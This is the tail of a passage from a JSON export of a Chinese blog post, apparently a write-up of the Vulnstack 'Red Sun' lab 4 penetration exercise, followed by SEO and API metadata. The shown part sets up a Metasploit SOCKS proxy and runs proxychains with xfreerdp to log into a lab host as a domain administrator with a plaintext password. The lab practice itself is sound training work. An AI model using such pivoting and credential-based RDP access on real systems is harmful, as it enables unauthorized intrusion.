SOCKS<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><a><\/a>use auxiliary\/server\/socks_proxy<br>set SRVHOST 127.0.0.1<br>set SRVPORT 1080<br>set VERSION 5<br>run -j<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>\u7136\u540e\nproxychains4 xfreerdp \/v:192.168.183.130 \/u:DEMO\\\\administrator \/p:'qwe123!@#' \/cert:ignore<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-24.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"670\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-24.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2030\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>\u673a\u5668\u5bc6\u7801 \u7f51\u7edc\u914d\u7f6e \u9776\u573a\u5730\u5740\uff1ahttp:\/\/vulnstack.qiyuanxuetang.net\/vuln\/ [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2039,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,5,1],"tags":[],"class_list":["post-1979","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-4","category-5","category-writings"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\u7ea2\u65e5\u9776\u573a\u56db - \u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/koishi.team\/index.php\/2026\/05\/08\/\u7ea2\u65e5\u9776\u573a\u56db\/\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u7ea2\u65e5\u9776\u573a\u56db - \u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c\" \/>\n<meta property=\"og:description\" content=\"\u673a\u5668\u5bc6\u7801 \u7f51\u7edc\u914d\u7f6e \u9776\u573a\u5730\u5740\uff1ahttp:\/\/vulnstack.qiyuanxuetang.net\/vuln\/ [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/koishi.team\/index.php\/2026\/05\/08\/\u7ea2\u65e5\u9776\u573a\u56db\/\" \/>\n<meta property=\"og:site_name\" content=\"\u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-08T12:06:21+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-05-25T12:44:52+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/\u5fae\u4fe1\u56fe\u7247_20260426194128_472_18-scaled.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"2560\" \/>\n\t<meta property=\"og:image:height\" content=\"1440\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Speeder\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/koishi.team\/wp-content\/uploads\/2025\/05\/77992108_p0-1-scaled.jpg\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"Speeder\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/08\\\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/08\\\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\\\/\"},\"author\":{\"name\":\"Speeder\",\"@id\":\"https:\\\/\\\/koishi.team\\\/#\\\/schema\\\/person\\\/61a09d37ac9078d28245c5e1502a58c3\"},\"headline\":\"\u7ea2\u65e5\u9776\u573a\u56db\",\"datePublished\":\"2026-05-08T12:06:21+00:00\",\"dateModified\":\"2026-05-25T12:44:52+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/08\\\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\\\/\"},\"wordCount\":502,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/#\\\/schema\\\/person\\\/61a09d37ac9078d28245c5e1502a58c3\"},\"image\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/08\\\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/koishi.team\\\/wp-content\\\/uploads\\\/2026\\\/05\\\/\u5fae\u4fe1\u56fe\u7247_20260426194128_472_18-scaled.jpg\",\"articleSection\":[\"\u53d6\u8bc1\",\"\u5e94\u6025\u54cd\u5e94\",\"\u6587\u7ae0\"],\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/08\\\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/08\\\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\\\/\",\"url\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/08\\\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\\\/\",\"name\":\"\u7ea2\u65e5\u9776\u573a\u56db - \u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/08\\\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/08\\\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/koishi.team\\\/wp-content\\\/uploads\\\/2026\\\/05\\\/\u5fae\u4fe1\u56fe\u7247_20260426194128_472_18-scaled.jpg\",\"datePublished\":\"2026-05-08T12:06:21+00:00\",\"dateModified\":\"2026-05-25T12:44:52+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/08\\\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\\\/#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/08\\\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-Hans\",\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/08\\\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\\\/#primaryimage\",\"url\":\"https:\\\/\\\/koishi.team\\\/wp-content\\\/uploads\\\/2026\\\/05\\\/\u5fae\u4fe1\u56fe\u7247_20260426194128_472_18-scaled.jpg\",\"contentUrl\":\"https:\\\/\\\/koishi.team\\\/wp-content\\\/uploads\\\/2026\\\/05\\\/\u5fae\u4fe1\u56fe\u7247_20260426194128_472_18-scaled.jpg\",\"width\":2560,\"height\":1440},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/2026\\\/05\\\/08\\\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/koishi.team\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u7ea2\u65e5\u9776\u573a\u56db\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/koishi.team\\\/#website\",\"url\":\"https:\\\/\\\/koishi.team\\\/\",\"name\":\"\u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c\",\"description\":\"\u300cSubterranean Rose\u300d\",\"publisher\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/#\\\/schema\\\/person\\\/61a09d37ac9078d28245c5e1502a58c3\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/koishi.team\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"zh-Hans\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/koishi.team\\\/#\\\/schema\\\/person\\\/61a09d37ac9078d28245c5e1502a58c3\",\"name\":\"Speeder\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-Hans\",\"@id\":\"https:\\\/\\\/koishi.team\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/75732553_p0-150x150.jpg\",\"url\":\"https:\\\/\\\/koishi.team\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/75732553_p0-150x150.jpg\",\"contentUrl\":\"https:\\\/\\\/koishi.team\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/75732553_p0-150x150.jpg\",\"caption\":\"Speeder\"},\"logo\":{\"@id\":\"https:\\\/\\\/koishi.team\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/75732553_p0-150x150.jpg\"},\"sameAs\":[\"https:\\\/\\\/koishi.team\"],\"url\":\"https:\\\/\\\/koishi.team\\\/index.php\\\/author\\\/speeder\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\u7ea2\u65e5\u9776\u573a\u56db - \u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/koishi.team\/index.php\/2026\/05\/08\/\u7ea2\u65e5\u9776\u573a\u56db\/","og_locale":"zh_CN","og_type":"article","og_title":"\u7ea2\u65e5\u9776\u573a\u56db - \u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c","og_description":"\u673a\u5668\u5bc6\u7801 \u7f51\u7edc\u914d\u7f6e \u9776\u573a\u5730\u5740\uff1ahttp:\/\/vulnstack.qiyuanxuetang.net\/vuln\/ [&hellip;]","og_url":"https:\/\/koishi.team\/index.php\/2026\/05\/08\/\u7ea2\u65e5\u9776\u573a\u56db\/","og_site_name":"\u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c","article_published_time":"2026-05-08T12:06:21+00:00","article_modified_time":"2026-05-25T12:44:52+00:00","og_image":[{"width":2560,"height":1440,"url":"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/\u5fae\u4fe1\u56fe\u7247_20260426194128_472_18-scaled.jpg","type":"image\/jpeg"}],"author":"Speeder","twitter_card":"summary_large_image","twitter_image":"https:\/\/koishi.team\/wp-content\/uploads\/2025\/05\/77992108_p0-1-scaled.jpg","twitter_misc":{"\u4f5c\u8005":"Speeder","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"12 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/koishi.team\/index.php\/2026\/05\/08\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\/#article","isPartOf":{"@id":"https:\/\/koishi.team\/index.php\/2026\/05\/08\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\/"},"author":{"name":"Speeder","@id":"https:\/\/koishi.team\/#\/schema\/person\/61a09d37ac9078d28245c5e1502a58c3"},"headline":"\u7ea2\u65e5\u9776\u573a\u56db","datePublished":"2026-05-08T12:06:21+00:00","dateModified":"2026-05-25T12:44:52+00:00","mainEntityOfPage":{"@id":"https:\/\/koishi.team\/index.php\/2026\/05\/08\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\/"},"wordCount":502,"commentCount":0,"publisher":{"@id":"https:\/\/koishi.team\/#\/schema\/person\/61a09d37ac9078d28245c5e1502a58c3"},"image":{"@id":"https:\/\/koishi.team\/index.php\/2026\/05\/08\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\/#primaryimage"},"thumbnailUrl":"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/\u5fae\u4fe1\u56fe\u7247_20260426194128_472_18-scaled.jpg","articleSection":["\u53d6\u8bc1","\u5e94\u6025\u54cd\u5e94","\u6587\u7ae0"],"inLanguage":"zh-Hans","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/koishi.team\/index.php\/2026\/05\/08\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/koishi.team\/index.php\/2026\/05\/08\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\/","url":"https:\/\/koishi.team\/index.php\/2026\/05\/08\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\/","name":"\u7ea2\u65e5\u9776\u573a\u56db - \u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c","isPartOf":{"@id":"https:\/\/koishi.team\/#website"},"primaryImageOfPage":{"@id":"https:\/\/koishi.team\/index.php\/2026\/05\/08\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\/#primaryimage"},"image":{"@id":"https:\/\/koishi.team\/index.php\/2026\/05\/08\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\/#primaryimage"},"thumbnailUrl":"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/\u5fae\u4fe1\u56fe\u7247_20260426194128_472_18-scaled.jpg","datePublished":"2026-05-08T12:06:21+00:00","dateModified":"2026-05-25T12:44:52+00:00","breadcrumb":{"@id":"https:\/\/koishi.team\/index.php\/2026\/05\/08\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\/#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["https:\/\/koishi.team\/index.php\/2026\/05\/08\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\/"]}]},{"@type":"ImageObject","inLanguage":"zh-Hans","@id":"https:\/\/koishi.team\/index.php\/2026\/05\/08\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\/#primaryimage","url":"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/\u5fae\u4fe1\u56fe\u7247_20260426194128_472_18-scaled.jpg","contentUrl":"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/\u5fae\u4fe1\u56fe\u7247_20260426194128_472_18-scaled.jpg","width":2560,"height":1440},{"@type":"BreadcrumbList","@id":"https:\/\/koishi.team\/index.php\/2026\/05\/08\/%e7%ba%a2%e6%97%a5%e9%9d%b6%e5%9c%ba%e5%9b%9b\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/koishi.team\/"},{"@type":"ListItem","position":2,"name":"\u7ea2\u65e5\u9776\u573a\u56db"}]},{"@type":"WebSite","@id":"https:\/\/koishi.team\/#website","url":"https:\/\/koishi.team\/","name":"\u5c0f\u77f3\u5934\u7684\u7eee\u5fc3\u697c","description":"\u300cSubterranean Rose\u300d","publisher":{"@id":"https:\/\/koishi.team\/#\/schema\/person\/61a09d37ac9078d28245c5e1502a58c3"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/koishi.team\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"zh-Hans"},{"@type":["Person","Organization"],"@id":"https:\/\/koishi.team\/#\/schema\/person\/61a09d37ac9078d28245c5e1502a58c3","name":"Speeder","image":{"@type":"ImageObject","inLanguage":"zh-Hans","@id":"https:\/\/koishi.team\/wp-content\/uploads\/2025\/05\/75732553_p0-150x150.jpg","url":"https:\/\/koishi.team\/wp-content\/uploads\/2025\/05\/75732553_p0-150x150.jpg","contentUrl":"https:\/\/koishi.team\/wp-content\/uploads\/2025\/05\/75732553_p0-150x150.jpg","caption":"Speeder"},"logo":{"@id":"https:\/\/koishi.team\/wp-content\/uploads\/2025\/05\/75732553_p0-150x150.jpg"},"sameAs":["https:\/\/koishi.team"],"url":"https:\/\/koishi.team\/index.php\/author\/speeder\/"}]}},"_links":{"self":[{"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/posts\/1979","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/comments?post=1979"}],"version-history":[{"count":5,"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/posts\/1979\/revisions"}],"predecessor-version":[{"id":2041,"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/posts\/1979\/revisions\/2041"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/media\/2039"}],"wp:attachment":[{"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/media?parent=1979"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/categories?post=1979"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/koishi.team\/index.php\/wp-json\/wp\/v2\/tags?post=1979"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}